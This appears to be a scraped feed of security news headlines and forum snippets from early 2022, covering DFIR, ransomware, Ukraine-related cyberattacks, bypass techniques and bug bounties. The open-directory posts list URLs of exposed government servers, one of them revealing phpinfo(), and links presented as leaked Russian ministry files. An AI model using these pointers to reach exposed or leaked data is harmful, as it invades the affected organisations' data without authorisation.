    Maltego is a tool for OSINT and visual link analysis. It can pull data from multiple sources to explore the properties of entities and the… Continue reading on Medium »
    Working with your own data: tips and tricks to kickstart your analytical task
    Our recent articles mostly tell about Lampyre’s OSINT capabilities. This one will be different as it describes the data analysis side of… Continue reading on Medium »
  • Open

    Know Your Infusion Pump Vulnerabilities and Secure Your Healthcare Organization
    Scans of more than 200,000 infusion pumps on the networks of hospitals and other healthcare organizations found 75% had known security gaps. The post Know Your Infusion Pump Vulnerabilities and Secure Your Healthcare Organization appeared first on Unit42.
  • Open

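    FreeBuf Morning Report | Ukrainian Researcher Leaks Conti Ransomware Source Code; Apple Disables Core iPhone Features in Russia
    Apple said that, following Russia's attack on Ukraine, it has stopped selling its products in Russia and restricted Apple Pay.
    Quickly Locating Cryptomining Trojans!
    The most telling characteristic of a cryptomining trojan is very high CPU usage; checking CPU usage with the top command shows that the xmr process is consuming a large share of CPU.
    What Is an SDK, and How Does It Threaten Our Privacy?
    As of now, 107 apps have still not completed rectification, including the apps of Ymatou (洋码头) and Offcn Education (中公教育).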

  • Open

    4 Weeks to prep for GCFA
    Is this even possible? I was given the material yesterday. I have some training under my belt, but overall still a noob when it comes to DFIR. Currently sitting through a 6 day course with a SANS instructor, but I feel like I am getting the exact same information from just reading the books. My experience in IT is less than 2 years and all training. Sec+ being my only previous cert. submitted by /u/SnooDogs3246 [link] [comments]
    ASK ALL NON-FORENSIC DATA RECOVERY QUESTIONS HERE
    This is where all non-forensic data recovery questions should be asked. Please see below for examples of non-forensic data recovery questions that are welcome as comments within this post but are NOT welcome as posts in our subreddit: My phone broke. Can you help me recover/backup my contacts and text messages? I accidentally wiped my hard drive. Can you help me recover my files? I lost messages on Instagram, SnapChat, Facebook, etc. Can you help me recover them? Please note that your question is far more likely to be answered if you describe the whole context of the situation and include as many technical details as possible. One or two sentence questions (such as the ones above) are permissible but are likely to be ignored by our community members as they do not contain the information needed to answer your question. A good example of a non-forensic data recovery question that is detailed enough to be answered is listed below: "Hello. My kid was playing around on my laptop and deleted a very important Microsoft Word document that I had saved on my desktop. I checked the recycle bin and it's not there. My laptop is a Dell Inspiron 15 3000 with a 256gb SSD as the main drive and has Windows 10 installed on it. Is there any advice you can give that will help me recover it?" After replying to this post with a non-forensic data recovery question, you might also want to check out r/datarecovery since that subreddit is devoted specifically to answering questions such as the ones asked in this post. submitted by /u/AutoModerator [link] [comments]
    Answering general digital investigation questions
    Last week we ran a stream about forensic hardware and got A LOT of general digital forensic questions. It might be interesting to anyone new to computer forensics. Use the chapter times in the video description to jump around. We also talk about hardware write blockers and forensic imagers. https://youtu.be/O1bZvGqmP1Y submitted by /u/DFIRScience [link] [comments]
    Incident Responder looking to transition into a digital forensics role
    Hello everyone! I have worked in infosec and IT for 6 years in incident response roles for companies ranging from startups to fortune 50. I currently work at a startup local cybersecurity firm where I am an incident response engineer and consultant. I handle everything on the IR side including ransomware cases, business email compromise, data theft, threat hunting, and compromise assessments. I also have my GSEC, GCIH, GCFE, and GCFA certifications. I love what I do, but I am burnt out. I’m tired of being on call 24/7/365, never being able to bring any of the criminals I work against to justice, and much more. My family and I are settling down, and I am interested in transitioning to a more traditional digital forensics role working on criminal cases. I want to have a more steady, stable case load, and actually see the results of my work helping bring people to justice. I was wondering if any of you have made a similar transition, and if there are any recommendations or insights that could help me make this switch. I have read the FAQ here and am looking for new jobs in this space, but would love to get some input from this community. Any thoughts? submitted by /u/horizon44 [link] [comments]
    What are some good triage tools for live MacOS and Linux systems?
    A customizable hash list is a must! Thanks submitted by /u/DHZX [link] [comments]
    Homework Help in HxD
    submitted by /u/Flaky_Tonight3305 [link] [comments]
  • Open

    Open Directories Kodi addon for version 19 Matrix?
    Anybody know where there is an updated version of the open directories addon for Kodi? We had an addon for Kodi version 18 Leia, but since that version relied on python 2, we now need an updated version for python 3. Or something similar. submitted by /u/studio222 [link] [comments]
    Collection of vintage video game and pc commercials
    http://ftp.kameli.net/pub/pkpvideos/ submitted by /u/inoculatemedia [link] [comments]
    Ministry of Economic Development of Russia Leaked by anonymous
    The sites seem to be down but I will provide the links in case they are back on. https://old.economy.gov.ru/minec/resources/ https://old.economy.gov.ru/wps/wcm/connect/economylib4/designElements/resources/ These are the tweets that link me there: https://twitter.com/youranonone/status/1498685800241934342?s=21 https://twitter.com/anonymous_link/status/1498607316836536320?s=21 submitted by /u/__babygiraffe__ [link] [comments]
  • Open

    Which is the efficient way to practice web application security?
    I read two books about web application security. Web Application Security: Exploitation and Countermeasures for Modern Web Applications Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities But I didn't practice enough. I have multiple options to practice it Port Swigger Web Security Academy bWAPP Vulnerability Disclosure Programs on HackerOne As I said I already read books about this topic, maybe I don't need to read PortSwigger Academy Articles. bWAPP is good but it consists of lots of vulnerabilities and I can't figure out how to prepare a work plan for that (Because of vulnerability count and expertise levels). VDPs on HackerOne are good because they are real-life challenges but I don't even know whether I am ready or not for testing real applications. I am open to any advice. submitted by /u/pacman0026 [link] [comments]
    Options for a malware sandbox with Internet access
    I am looking for a solution to work with and detonate potentially malicious files & malware. An isolated (from rest of LAN) malware sandbox, with Internet access. I have been considering a Type 2 hypervisor such as VirtualBox running Windows 10 Pro. It seems if I go with this solution I may need a 2nd VM running a Firewall to ensure the Win10VM cannot spread malware to other devices on the LAN. Seeking input on other methods or options to build such an environment. submitted by /u/q_logsource [link] [comments]
    Help to improve AKS Pod's security
    Hello. I want to use Azure Kubernetes environment for running Azure DevOps build agents. Besides, tried to make the environment secure, by following the principle of least privilege. As a result - Dockerfile and Pod's definition which runs container as an unprivileged user (nobody) on a read only filesystem (except /tmp and /azp paths). What else could be done to improve environment's security? submitted by /u/groovy-sky [link] [comments]
    How do you organize your study?
    Currently I work as SOC analyst, I do like studying and coding, so after work I usually study some stuff related to security, but from time to time I find myself starting new courses without finishing anything, and read about different topics, but can't focus, which waste much time and effort. I'm not sure if anyone else faces the same issue and how can I focus more? submitted by /u/xoutisx [link] [comments]
    What are the biggest barriers stopping NetSec from going into Virtual Reality?
    Specifically, imagine a Virtual Reality tool that would allow you to navigate your entire network in a three dimensional space, to detect vulnerabilities and such. The first barrier that comes to mind would be cost of equipment, especially if organizations need to buy multiple headsets for their employees. But what other barriers do you foresee? VR is already pretty popular, so I'm surprised it's not already more adopted in this space. Disclaimer: I work for a VR startup in the NetSec space and we are trying to gather feedback from NetSec professionals. You can visit our website if you want to learn more, we are offering headsets in exchange for good user feedback. There's a survey link on our contact us page: https://valkure.com TIA submitted by /u/loshofficial [link] [comments]
    Entire infosec team replaced by... IT team?
    Anyone ever experience this? I'm the last technical infosec person left on a former team of ~14 people. Now we have replaced the entire infosec team with IT/non-infosec people, who are all basically entry-level in infosec, although they may have skills in other areas such as IT/cloud. I feel genuinely concerned because it's clear none of them have the skills, knowledge or experience to do anything in these job functions security wise. They are just having tons of random meetings to try and figure out what to do next, and not actually getting anything done. They've been "talking" about what to do for 9 months. It's starting to feel like a scam, and I'm having to hold people's hands with extremely basic scripting and technical tasks. At first it was cool, because I had the opportunity to mentor them, but NOTHING is getting done. What the hell is going on? submitted by /u/netipotty [link] [comments]
    Is whitelisting DNS zones to prevent DNS tunneling viable? Why is it not more common?
    I'm concerned about malware which uses DNS channels to communicate home. I'm thinking about ways to mitigate this threat for my servers, and the most obvious measure that comes to mind, is to have my DNS resolver block recursive lookups to zones which are not whitelisted. So, the plan is to (1) make my firewall block all DNS traffic from my server except to my own resolver, and (2) have my own resolver block all lookups to non-whitelisted zones. So e.g., a lookup to *.microsoft.com would be recursively resolved, but not a lookup to *.evildomain.com. When Google searching for ways to mitigate DNS tunneling, this is not a commonly suggested countermeasure. Most blogs and articles answer this question by referring to some expensive, "smart", enterprisey DNS filter. Is my countermeasure less easy than it sounds? If not, why is this countermeasure not more common? submitted by /u/engineerL [link] [comments]
    What is the most difficult part of being a SOC Analyst?
    Every job has pros and cons. What do you think about being a SOC analyst? A lot of people are saying about stress and over working. Maybe it's not worth being a SOC analyst? What do you guys think? submitted by /u/umuttosun [link] [comments]
    How to test our AV/EDR
    So if I remember well, a few years ago there were dedicated scripts and binaries to test if your AV/EDR works well, but I can’t find that anywhere. Do you have recommendations for that? What I’d like is to go a bit further than just compiling and running netcat/mimikatz… which would not involve running MSF modules at all. submitted by /u/EsreverEngineering [link] [comments]
    Not getting methodological approach to information audit. What are they trying to say?
    https://www.reddit.com/r/audit/comments/t47la5/not_getting_methodological_approach_to/ submitted by /u/whatusernameiscool [link] [comments]
    How do cybercriminals/"hackers" defend themselves?
    I've always been puzzled by the idea that hackers are vulnerable themselves? Like how can one say they are 100% defended from counter-attack? In any reading/research on cyber-defence I've ever done, the idea is you can never be 100% secure. Is it like an arms race of being "cleverer" than whoever might be on the counter-attack? Not sure if anyone can shed insight on this - thanks \editing post to say you can never be 100% secure, previously I had 10%) submitted by /u/mdgsec [link] [comments]
    Getting Started on Pentesting an IOT Device
    I'm relatively inexperienced at security and am trying to improve my skills. I have a custom made IOT device at home which I am trying to find vulnerabilities in and am looking for suggestions of what to investigate. I scanned with nmap using script=vulners. Only port 22 is open and there are a few vulnerabilities (OpenSSH 7.9p1) but nothing very promising as far as I can tell. Brute-forcing the SSH password using Hydra is also not very promising as it is fairly slow and I know the device has a reasonably complex password which is not in common password lists like rockyou. Any suggestions on other approaches to find vulnerabilities in the device? submitted by /u/MrKhutz [link] [comments]
    What is vulnerability sweeping?
    I was asked the question what vulnerability sweeping is, but I can't seem to find a definitive answer for it, only definitions for vulnerability scanning. submitted by /u/pleaseweallneedhelp [link] [comments]
  • Open

    Protests against Russia’s attack on Ukraine + more
    the discursus Protest Analytics newsletter, March 1st, 2022 edition. Continue reading on discursus.io »
    The Ides of March: Fall of the Russian Bear?
    A critical update has come across my feed. The New York Times lost the lede in a story today. Continue reading on Medium »
    Verify Viral Photos with Reverse Search
    How to use Google Reverse Image Search to verify the source of photos from Ukraine Russian conflict. Continue reading on Medium »
  • Open

    5 New Vulnerabilities in PJSIP Multimedia Library, including RCE
    submitted by /u/SRMish3 [link] [comments]
    Triaging A Malicious Docker Container
    submitted by /u/MiguelHzBz [link] [comments]
    Multiple vulnerabilities found in voip monitor by an Ethiopian Security firm
    submitted by /u/nathanAbejeM [link] [comments]
    TeaBot is now spreading across the globe | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
    Exploiting CVE-2021-26708 (Linux kernel) with sshd
    submitted by /u/hardenedvault [link] [comments]
  • Open

    MySQL DUMPFILE
    This article aims to reinforce the importance of performing hardening and/or a security review before putting a server… Continue reading on 100security »
    Analysis of a trojanized anydesk
    This blog provides a detailed analysis of anydesk application that has been trojanized and distributed from a ranked unofficial website… Continue reading on Medium »
  • Open

    Password Reset to Admin Access
    While testing a web application that used a web GUI over the top of an API, I noted the calls to the API were authorized with a JWT token… Continue reading on Techiepedia »
    What After 12th? as an Ethical Hacker.
    This is not an accurate path for an ethical hacker. Continue reading on Medium »
    No Rate Limiting on Forget Password Page (Email Triggering)
    Vulnerability Category: A6- Security Misconfiguration Continue reading on Medium »
    Facing Issues with Nuclei upgrade??
    Few weeks back, I too faced the same situation. Tried multiple ways to upgrade my Nuclei version but it just got stuck at version 2.2.0… Continue reading on Medium »
    On the way to 2nd Bounty XSS and Apache server .
    Hello readers, in this post, we’ll look at XSS and Apache Server; further on Apache server I will post another article. Continue reading on Medium »
  • Open

    SecWiki News 2022-03-01 Review
    A Look at the BPF Covert Channel in "Bvp47: Top-tier Backdoor of US NSA Equation Group" by ourren DICOS: A Method for Discovering Insecure Code in the Stack Overflow Community by ourren A Detailed Explanation of "BAS", the Hottest Security Technology of 2022 by ourren For more of the latest articles, visit SecWiki
  • Open

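    A Dynamic CNN Model for Identifying Fake Profiles in Online Social Networks
    Online social networks (OSNs) are popular applications for sharing all kinds of data, including text, photos and videos. However, the problem of fake accounts is one of the obstacles facing current OSN systems. Attackers use fake accounts to distribute misleading information, such as malware, viruses or malicious UR
    Algorithmic Recommendation Management Provisions Take Effect March 1; Algorithm Filing System Officially Launches
    The Provisions specify that applying algorithmic recommendation technology means using algorithmic techniques such as generation and synthesis, personalized push, ranking and selection, retrieval and filtering, and scheduling and decision-making to provide information to users.
    Conti Backs Russia; Ukrainian Member Publishes Its Internal Chat Logs
    Right after the Conti ransomware group chose to support Russia, a Ukrainian member leaked more than 60,000 messages from the group's internal chats.
    FreeBuf Morning Report | Insurance Giant AON Hit by Cyberattack over the Weekend; Moscow Exchange Taken Down by Cyberattack
    Microsoft revealed that, hours before the invasion, Ukrainian entities were targeted by FoxBlade, a previously undiscovered piece of malware. The Microsoft Threat Intelligence Center (MSTIC) continues to investigate the attacks against ....
    Insurance Giant AON Hit by Cyberattack
    AON disclosed that it suffered a cyberattack on February 25, 2022. In its report, AON gave no further information beyond stating that the attack occurred and affected a limited number of systems.
    Toyota's Japanese Plants Halt Production After Supplier Suffers Cyberattack
    Because Kojima Industries, a supplier of interior and exterior plastic parts to Toyota Motor, was hit by a cyberattack, Toyota suspended production at its plants in Japan from March 1.
    Cyber Warfare Has Become the "Fifth Battlefield": These Figures Show the Current State of Ukraine's Networks
    Cyber warfare has developed to hold the same domain status as sea, land, air and space, and is also listed as the "fifth battlefield".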
  • Open

    Demonstration of how to use Counter-Strike 1.6 as Malware C2
    If you're a malware operator who likes to Rush B and want to manage your victims while playing games, this is for you. https://www.youtube.com/watch?v=b2L1lWtwBiI&t=1s https://twitter.com/kaganisildak/status/1498585440680656896 submitted by /u/kaganisildak [link] [comments]
  • Open

    Session Fixation on Acronis
    Acronis disclosed a bug submitted by hatnare: https://hackerone.com/reports/1486341
  • Open

    Exploiting CVE-2021-26708 (Linux kernel) with sshd
    Article URL: https://hardenedvault.net/2022/03/01/poc-cve-2021-26708.html Comments URL: https://news.ycombinator.com/item?id=30511060 Points: 2 # Comments: 0
  • Open

    Windows Exploitation Research
    Hi, I am starting Windows security research to understand how Windows internals work and how one can exploit them. If anyone is interested, he/she can DM me submitted by /u/i_whiteheart [link] [comments]
  • Open

    Samsung Encryption Vulnerability [pdf]
    Article URL: https://eprint.iacr.org/2022/208.pdf Comments URL: https://news.ycombinator.com/item?id=30510543 Points: 1 # Comments: 0

  • Open

    Essential Skills to be a SOC Analyst
    Hi all, This video covers what the essential mindsets are to be an effective SOC analyst. It covers WHAT the mindsets are, WHY they are relevant to a SOC analyst, and HOW these mindsets can be developed. This is far more important than technical skills which can be taught. So, if you are a ‘new’ or aspiring analyst, or an experienced senior analyst, or even if you are on the periphery of cyber security in IT or are just curious, this video will have something for you. Happy Cybering! https://youtu.be/HOFfYUd7DbE submitted by /u/SyPy [link] [comments]
    how to deal with phishing email in a big company?
    I'm a new graduate and I had a job interview for a SOC analyst position, one of the questions that kinda confused me is "how do you identify and deal with phishing emails?". First I answered with the basic clues: weird email address; unknown domain; bad grammar/spelling; no asking for sensitive data; no shady urls/files and use plugins to analyse the emails. But they told me what if the email seems perfect, like a gmail domain, good spelling and formatting and no urls or files attached. In my mind I'm thinking so how is this a phishing email if there is nothing suspicious in it. But I still tried to answer saying that you can teach your employees to be aware of such emails and to report them to the security team in case they find a suspicious email. They answered what if the company has thousands of employees, how is the security team gonna deal with potential hundreds of emails from the employees. At this point I got nothing else to say, what am I supposed to answer in this situation? thanks. submitted by /u/Dalleuh [link] [comments]
    Third party library license risk with Single Page Applications
    Many open source licenses have different rules depending on if the library is used with a SaaS product or an externally deployed product. Does using an open source library within a Single Page Application architecture mean the library is now deployed to the user's browser and thus is externally deployed? submitted by /u/jrminty [link] [comments]
    Struggling to learn networks, can I learn it through programming and GNS3?
    Hi, so on my last infosec interview the guy told me to study more networks, and he suggested studying the content of Network+. I am trying to learn from Mike Meyers's course but struggling badly. There are a lot of theories here and I keep missing a lot of points. So I want to learn it more practically and in parallel learn the theories. I am good with programming and I have GNS3. So my question, can I learn networking and Network+ content through network programming and GNS3? submitted by /u/Ramseesthe4th [link] [comments]
  • Open

    What is a Google Dork and how is it used?
    OSINT techniques Continue reading on Medium »
  • Open

    The (Mis)Use of Artifact Categories
    Very often in DFIR, we categorize artifacts in an easy-to-understand and easy-to-digest manner, as using or relying on these categories often helps us navigate our investigations. There are also times when we reduce those artifacts to a level where they're easier to understand, and in doing so, the categorization of the artifact isn't quite accurate. As such, it's necessary now and again to go back and take a look at that categorization to determine if it still holds, or if it truly served the community in the manner intended. SPOILER ALERT - TL:DR Within the DFIR community, we should not be hanging investigation findings on single artifacts in isolation. If there are gaps in data, they need to be recognized, understood and communicated. Do not spackle those gaps over with guesswork and assu…
  • Open

    Breaking Google’s ReCaptcha v2 using.. Google.. Again
    submitted by /u/n0llbyte [link] [comments]
    Rogue RDP: New Initial Access Technique via RDP Bypassing Clients/Servers/Security Vendors
    submitted by /u/ustayready [link] [comments]
    Alan c2 Framework v6.0: Alan + JavaScript = ♡
    submitted by /u/aparata_s4tan [link] [comments]
  • Open

    Phishing
    In the digital world everyone is using smart devices for day-to-day activity. We’re sharing a lot of information, at the same time receiving many… Continue reading on Medium »
    BYPASS AMSI
    Cooking our recipe with PowerShell and C# Continue reading on Medium »
  • Open

    Does anyone know how I can mount a raw/image that is encrypted with LUKS? I have the decryption password.
    Does anyone know how I can mount a raw/image that is encrypted with LUKS? I have the decryption password. submitted by /u/rvndomus3r2019 [link] [comments]
    Is there a way to find out whether the timestamp on a file has been modified?
    I know it's very easy to modify the "Date created" and "Date Modified" attributes of a file. Is there any way to know if the timestamps have been modified? Can I look at a list of dates modified? Any logs or tools? Before someone suggests it, a backup won't help because the last VSS available is before the file was initially created. The file was created within the last 14 days, I have reason to believe that the date has been modified. I'd really appreciate the help. submitted by /u/Serious_Mongoose_522 [link] [comments]
    Let's Talk About NTFS Index Attributes
    Good morning, It’s time for a new 13Cubed episode! Let’s revisit a critical NTFS artifact: NTFS Index Attributes (also referred to as $I30 files). We'll cover all of the information you need to know, and take a look at a new tool called INDXRipper. Episode: https://www.youtube.com/watch?v=x-M-wyq3BXA Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
  • Open

    microscopic aquatic animals
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Files from Cleveland State Community College
    http://www.clevelandstatecc.edu/content/ submitted by /u/depressedclassical [link] [comments]
    1980s and early 1990s software
    http://cd.textfiles.com/dfeno1/ submitted by /u/depressedclassical [link] [comments]
  • Open

    AlbusSec:- Penetration-List 04 File Inclusion
    Hello Members, I hope that you liked Penetration-List Project, Therefore, I worked hard to complete Penetration-list Project. Firstly, I… Continue reading on Medium »
    My Pentest Log -8-
    Greetings from Caenopolis to all, Continue reading on Medium »
    Jax.Network weekly update
    by Maryna Trifonova, Head of Content at Jax.Network Continue reading on Jax.Network Blog »
    How anyone could have gotten a free pass to attend @IWCON2022
    Recently I attended InfoSec Community (@InfoSecComm) ‘s security conference IWCON2022. Awesome conference and awesome experience attending… Continue reading on Medium »
    NMAP commands
    Basic Scan on a Single IP: Continue reading on Medium »
    Everything you need to know about Bug Bounties
    What are Bug Bounty Programs Continue reading on Medium »
  • Open

    SecWiki News 2022-02-28 Review
    SecWiki Weekly (Issue 417) by ourren Facilitating Vulnerability Assessment through PoC Migration by ourren For more recent articles, visit SecWiki
  • Open

    Climate Change 2022: Impacts, Adaptation and Vulnerability
    Article URL: https://www.ipcc.ch/report/ar6/wg2/ Comments URL: https://news.ycombinator.com/item?id=30500104 Points: 2 # Comments: 0
  • Open

    Stack-based Buffer Overflow Series (aimed at beginners)
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

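    WeBank application security team is hiring | Shenzhen
    The WeBank application security team is recruiting for application security positions
    Ukraine recruits an "IT army"; 31 Russian entities become attack targets
    Ukraine intends to form a volunteer "IT army" to carry out cyberattacks against Russia.
    FreeBuf Morning Report | Meta blocks Russian state media accounts in Ukraine; Iranian hacker group attacks using new malware
    Ukraine is recruiting a volunteer IT army made up of white-hat hackers to launch attacks against a range of Russian entities.
    Benefits of wildcard SSL certificates and how to choose one
    For business reasons, many websites have multiple subdomains under the same main domain. In this case, applying for an SSL certificate calls for care: both the site's security needs and cost-effectiveness have to be considered, and the first choice is
    China Everbright Bank security division recruitment notice
    Hiring for security engineer, security operations, security management and other positions.
    Zhang Qiming, deputy head of the United Front Work Department of the Anhui Provincial Party Committee, leads a team visit to the Hefei R&D base of 全息网御
    Recently, Zhang Qiming, deputy head of the Anhui Provincial United Front Work Department, led a team to visit the Hefei R&D base of 全息网御, hearing in particular about the company's independently developed core technologies, its industry positioning focused on data security and its ecosystem-cooperation application scenarios, and holding in-depth exchanges on the future development of technology companies. He pointed out
    GPU giant NVIDIA hit by "devastating" cyberattack; top malware shuts down its botnet infrastructure | Global cybersecurity highlights for February 28
    The modular Windows crimeware platform known as TrickBot officially shut down its infrastructure on Thursday, following reports that it was about to retire amid a nearly two-month lull in activity.
    EU officially publishes the Data Act; Ukraine hit by DDoS attacks again; cookware giant Meyer attacked and internal data leaked | Cybersecurity weekly
    On February 23, the European Commission published a proposal called the Data Act, which aims to help small companies catch up with large ones in competition and profit from the non-personal data generated by connected products ranging from smart home appliances to cars.
    PortSwigger file upload series: detailed File Upload notes
    I actually heard about file upload vulnerabilities quite early on and did some challenges on them in a few CTF competitions; let's work through the PortSwigger ones again.
    Anonymous breaches the internal network of Belarusian Railways
    Anonymous breached Belarusian networks and affected railway operations.
    NVIDIA hit by cyberattack, 1TB of data stolen
    The attack affected the company's developer tools and email systems, and 1TB of data was stolen, including employees' online credentials.
    In 2021, exploitation of unpatched vulnerabilities was the main entry point ransomware attacks relied on
    Attacks resulting from exploitation of vulnerabilities in unpatched software increased by 33%; this was the entry point ransomware attackers relied on most in 2021, accounting for 44% of ransomware attack causes.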
  • Open

    Invicti Security Adds Software Composition Analysis to Its Industry- Leading AppSec Platform
    With headline-grabbing vulnerabilities such as Log4Shell drawing attention to the risks presented by open-source components, organizations increasingly need application security programs that address this risk. READ MORE
    DAST, IAST, SCA: Deeper coverage in a single scan
    With Invicti SCA as part of your application security program, you can track and secure open-source components for deeper coverage in one single scan. READ MORE
  • Open

    File Transfer Filter Bypass: Exe2Hex
    Introduction Exe2hex is a tool developed by g0tmilk which can be found here. The tool transcribes EXE into a series of hexadecimal strings which can The post File Transfer Filter Bypass: Exe2Hex appeared first on Hacking Articles.
    Windows Persistence: Shortcut Modification (T1547)
    Introduction According to MITRE, “Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level The post Windows Persistence: Shortcut Modification (T1547) appeared first on Hacking Articles.
  • Open

    Argo Security Automation with OSS-Fuzz
    Continuous Fuzzing Integration in Argo Continue reading on Argo Project »

  • Open

    How do you copy text from photos?
    Techniques used in open source intelligence Continue reading on Medium »
    I hate Marinas, It’s too Crowded —OSINT Challenge 21 and 22
    While I was reading some Medium blogs, I came across @Sofia Santos’s blogs (this writeup specifically: Walkthrough — Hacktoria… Continue reading on Medium »
    Watch your shadow: how can we tell when a photo was taken from the shadows in it?
    Techniques used in open source intelligence Continue reading on Medium »
    The Current State of the Cyber War Between Russia and Ukraine — An OSINT Analysis
    Go through the following OSINT analysis courtesy of Dancho Danchev on the current state of the cyber war between Russia and Ukraine. Enjoy! Continue reading on Medium »
  • Open

    Large Amount of IPs coming from Europe
    Hi, Little background info first. I'm a beginner Networking & Security student so I'm not that unfamiliar with stuff, I don't have anything hosted other than a VPN, and I'm using a consumer grade router that's not capable of VLANs, and other good stuff. I may be just a little paranoid but I've been noticing a lot of blocked IP requests from Russia in the security log for my router. Almost 50% of what I found in the log for February 27 is from over there. One of the IPs I found had 32 hits, another had just 9. Coming in second is the US, then there's Switzerland, Germany, Lithuania. From just the couple foreign IPs that I looked up using https://www.abuseipdb.com/, all of them were flagged for high confidence of abuse. I don't have anything against those countries but I was wondering what all that's going on if I should be more concerned than usual. I'd just like my computer and data to remain in one piece. Not sure if I should be saying anything else about my setup on a public post here but could appreciate some advice. Only tech guy in my family so can't ask anyone else. I'm considering just disabling the VPN so I don't have any more open ports, and using iCloud Private Relay or something else when I'm out. I'm aware of pfSense, and I was considering it, but I just don't want to spend $$$ with inflation, chip shortages, and who knows what else. Anyway thanks in advance. submitted by /u/Expensive-Exit6398 [link] [comments]
    How does cross-browser checking work?
    I am not familiar with technology. But this kinda freaked me out. https://fingerprintjs.com/blog/external-protocol-flooding/ Following the article, I went ahead and did this test, https://schemeflood.com/ I recently installed Fedora on my desktop but it showed all the apps I installed on Windows previously. (it's not a dual boot) Did I mess something up when installing? or is it a vulnerability? submitted by /u/manho1e [link] [comments]
    What are your methods for investigating JA3 & JA3S IOC hits?
    What sites do you use to validate information? Even if the certificate is valid, how are you ensuring it’s for that proper site? What if the certificate says self-signed or expired? submitted by /u/pass-the-word [link] [comments]
  • Open

    Qualys Vulnerability Detection Pipeline
    Article URL: https://qualys-secure.force.com/discussions/s/ Comments URL: https://news.ycombinator.com/item?id=30492601 Points: 2 # Comments: 0
  • Open

    Various governments open directories
    https://www.mendoza.gov.ar/wp-content/uploads/ https://www.mrt.tas.gov.au/mrtdoc/ https://hret.gov.ph/admin.hret.gov.ph/ https://tuguegaraocity.gov.ph/public/ https://tuguegaraocity.gov.ph/admin/ (sometimes throws a PHP error for some reason) https://web.yme.gov.gr/data/ https://geoftp.ibge.gov.br/ http://www.pmf.sc.gov.br/arquivos/arquivos/ http://maps.six.nsw.gov.au/csv/ http://globe.six.nsw.gov.au/csv/ https://irs.os.gov.ng/wp-content/uploads/ https://online.agriculture.gov.au/static/department/ http://itaperuna.rj.gov.br/planoDiretorArquivos/ https://www.czj.sh.gov.cn/zss/ http://www.mto.gov.on.ca/documents/ https://tnlandsurvey.tn.gov.in/assets2/correlation/ (/assets2/ returns 403, /assets/ returns phpinfo()) https://info.saude.df.gov.br/wp-content/uploads/ http://www…
    A full Google Drive as an archive related to my time in Psychic Tv in the ‘90s. Music, photos, multimedia. And current projects.
    submitted by /u/inoculatemedia [link] [comments]
    Movies, shows and 'more'
    http://51.77.66.14/ some good NSFW stuff in sarasa folder submitted by /u/LucasImages [link] [comments]
  • Open

    Attacking IBM MQ — SWIFT to Steal Money$$$
    What is IBM MQ? Continue reading on Medium »
    All about Account Takeover
    Account Takeover Methods Continue reading on InfoSec Write-ups »
    StaFi and Immunefi Partner to Launch A Bug Bounty For rDex Testnet
    Introduction Continue reading on Medium »
    Finding EXIF Geo-location of images
    Let us learn about finding EXIF Geo-Location of images Continue reading on Medium »
    Methods to Bypass two factor Authentication
    There are multiple ways to bypass two-factor authentication. Some of these ways are here. Continue reading on Medium »
    BUG BOUNTY CHECK LIST BY C1
    C1h2e1 Continue reading on Medium »
    Easy Windows 0 day UAC Bypass!
    Hey guys! I am harish, I used to find vulnerabilities on the Microsoft bug bounty program and Google VRP! Continue reading on Medium »
  • Open

    Attacking IBM MQ — SWIFT to Steal Money$$$
    What is IBM MQ? Continue reading on Medium »
    We Put A C2 In Your Notetaking App: OffensiveNotion
    A Red Teaming Science Fair Project Continue reading on Medium »
  • Open

    SecWiki News 2022-02-27 Review
    Customizing a Docker image for AWVS by sinver For more recent articles, visit SecWiki
  • Open

    Circumventing Deep Packet Inspection with Socat and rot13
    submitted by /u/jrj334 [link] [comments]
    ZDI-CAN-12671: Windows Kernel DoS/Privilege Escalation via a NULL Pointer Deref
    submitted by /u/yuhong [link] [comments]

  • Open

    Intigriti’s February XSS challenge By aszx87410
    February’s XSS challenge is here! On the surface the challenge seems simple but it actually gives light upon two very interesting topics … Continue reading on Medium »
    From zero to hero – XSS
    This article is about what you need to know about Cross-Site-Scripting(AKA. XSS). Continue reading on Medium »
  • Open

    How to geolocate a Twitter video using free OSINT tools
    And how relying on information from the news can set you back. Continue reading on Medium »
    Open Source Intelligence — OSINT
    Open Source Continue reading on Medium »
  • Open

    Fuzzing Network Servers with De-Socketing
    submitted by /u/martinclauss [link] [comments]
    The Ransomware Files podcast: In 2019, 23 cities in Texas were infected with the REvil ransomware in a huge attack. The cities recovered quickly but a MSP, whose ScreenConnect software was exploited, was irreparably damaged. It's a heartbreaking story that reveals the human cost of ransomware.
    submitted by /u/ferrochron1 [link] [comments]
  • Open

    Zulip Cloud security vulnerability with reusable invitation links
    Article URL: https://blog.zulip.com/2022/02/25/zulip-cloud-invitation-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30479430 Points: 81 # Comments: 29
  • Open

    SecWiki News 2022-02-26 Review
    No news updates today~ For more recent articles, visit SecWiki
  • Open

    Give Me Some (macOS) Context…
    This blog post will dive into what I like to call “execution contexts” on macOS and why it is important to understand these different… Continue reading on Medium »
  • Open

    Wget security questions
    Are there any security concerns with using wget? Is there anything I should be aware of to stay relatively safe? submitted by /u/fenriswolf_411 [link] [comments]
    This sub is being mentioned on Ukraine related subs.
    There are talks requesting that videos, images, etc be archived from r/Ukraine just in case information starts disappearing. Not sure if you guys do that sort of thing but having seen this sub mentioned I figured I'd bring it up here. submitted by /u/Tripartist1 [link] [comments]
    The official SteamOS repo, including ISOs of internal versions.
    submitted by /u/wertercatt [link] [comments]
  • Open

    Examining a Windows LTSC system
    How much more difficult is it to gather evidence from a Windows operating system that is the LTSC version when compared with a regular Windows system? I know LTSC is supposed to be much more privacy friendly and disables telemetry so just thought I would ask out of curiosity. submitted by /u/xnospax [link] [comments]
  • Open

    Kali Linux: Top 5 tools for information gathering
    What is information gathering? Continue reading on Medium »
    My first bug in just 5 minutes
    Hello hacker, today I'm going to tell you how I found my first bug (vulnerability) in just 5 minutes Continue reading on Medium »
    SSRF & LFI In Uploads Feature
